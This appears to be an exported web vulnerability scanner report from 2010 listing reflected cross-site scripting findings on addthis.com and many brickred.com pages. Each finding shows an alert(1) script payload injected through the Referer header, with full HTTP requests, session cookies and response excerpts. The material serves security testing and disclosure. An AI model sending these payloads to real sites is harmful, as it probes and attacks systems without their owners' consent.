HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 02:56:07 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 88741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=747e6"><script>alert(1)</script>58d710c40ce" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 1b5aa<script>alert(1)</script>5b756592eba was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=1b5aa<script>alert(1)</script>5b756592eba
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 02:56:08 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 88727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>1b5aa<script>alert(1)</script>5b756592eba - Google search</h4> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d2d2"><script>alert(1)</script>545c3d05d42 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=1d2d2"><script>alert(1)</script>545c3d05d42
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=B9B5B8C81CDD6003BA95D912784D507F; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:36 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afacd"><script>alert(1)</script>70bc903de91 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/ HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=afacd"><script>alert(1)</script>70bc903de91
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=E4C4D7BA17AC5ED0BE7A3217106C33D2; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:06 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39fa8"><script>alert(1)</script>3ff1959561e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/CommodityTrading.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=39fa8"><script>alert(1)</script>3ff1959561e
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=C43FAFCCB871B5628FEFFAAC4EADA4DF; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:43 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43b7f"><script>alert(1)</script>f65e8032b1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/Custom_Application_Development.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=43b7f"><script>alert(1)</script>f65e8032b1
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=91CFA0706415FDD908DF5581F7E91D8C; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:17 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 127c1"><script>alert(1)</script>0f547f6ecef was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/DocumentControl.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=127c1"><script>alert(1)</script>0f547f6ecef
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=666C27A78CDBE5BAB35B682B9351D0B6; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:43 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11f24"><script>alert(1)</script>f699fd5e44 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/ForexTrading.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=11f24"><script>alert(1)</script>f699fd5e44
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=AA162ACA56C91816053C1FDA4AA51432; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:44 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8704a"><script>alert(1)</script>3d616aaa6e1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/IT_Consulting_Firms.jsp HTTP/1.1 Host: www.brickred.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=8704a"><script>alert(1)</script>3d616aaa6e1 Cache-Control: max-age=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=DD5C7F6ABCBDF55C3E8B31A025539320; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:29:39 GMT Server: Apache-Coyote/1.1 Content-Length: 41454
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 673c2"><script>alert(1)</script>e569fc5d573 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/PortfolioManagement.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=673c2"><script>alert(1)</script>e569fc5d573
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=98FB679AB1F7FF1C67813EDE2BA09627; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:44 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89c9c"><script>alert(1)</script>66a1331a5ad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/Request.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=89c9c"><script>alert(1)</script>66a1331a5ad
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=4AB930D7BDD6C1EF14A51D045CFC0EE3; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:09 GMT Server: Apache-Coyote/1.1 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc628"><script>alert(1)</script>5016f520402 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/Technologies-lamp.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=cc628"><script>alert(1)</script>5016f520402
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=9453170B86EA877CB95F8A2C3A17B65E; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:41 GMT Server: Apache-Coyote/1.1 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 736cd"><script>alert(1)</script>bc4fcf601d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/TravelPortal.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=736cd"><script>alert(1)</script>bc4fcf601d
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=9B1ADB0196747B6E8AF6C56AA65FBED2; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:47 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3f78"><script>alert(1)</script>625e0c06536 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/about_us.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=d3f78"><script>alert(1)</script>625e0c06536
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=D5065AD1C0AA9B7C70AAAB63F304E742; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:05 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be475"><script>alert(1)</script>14080b20bc2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/ajax_generic.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=be475"><script>alert(1)</script>14080b20bc2
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=5303A42AD1487CA6C832BFD12826CB00; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:38 GMT Server: Apache-Coyote/1.1 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 711fa"><script>alert(1)</script>46adda58620 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/application_migration.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=711fa"><script>alert(1)</script>46adda58620
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=489D4CAEFBB09061D5A1C970807867D9; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:16 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfcea"><script>alert(1)</script>b0f07872d46 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/award.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=bfcea"><script>alert(1)</script>b0f07872d46
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=2172F7AACFE70F5F5B55FE61FCEB04D1; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:42 GMT Server: Apache-Coyote/1.1 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8a03"><script>alert(1)</script>88d646bf1eb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/contact_information.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=c8a03"><script>alert(1)</script>88d646bf1eb
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=88220961390B8B0C4A0A76376B519983; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:12 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a8a9"><script>alert(1)</script>9cdd777b74f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/documentum_technology.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=4a8a9"><script>alert(1)</script>9cdd777b74f
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=E44D66CF187B7084877396277E12168D; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:41 GMT Server: Apache-Coyote/1.1 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f023c"><script>alert(1)</script>6c42410f5a9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offering/failure_outsourcing.jsp HTTP/1.1 Host: www.brickred.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9DC1CA0451F4B50C5D7E3ADBE407985C; el=-1; __utmz=59022590.1290653931.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; __utma=59022590.1889420843.1290264332.1290264332.1290653931.2; __utmc=59022590; __utmb=59022590.1.10.1290653931; Referer: http://www.google.com/search?hl=en&q=f023c"><script>alert(1)</script>6c42410f5a9
Response
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=D604C731CD7F40CA16890C8F601FFE02; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 25 Nov 2010 03:52:37 GMT Server: Apache-Coyote/1.1 Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0fc2"><script>alert(1)</script>5fc2e29b4d5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
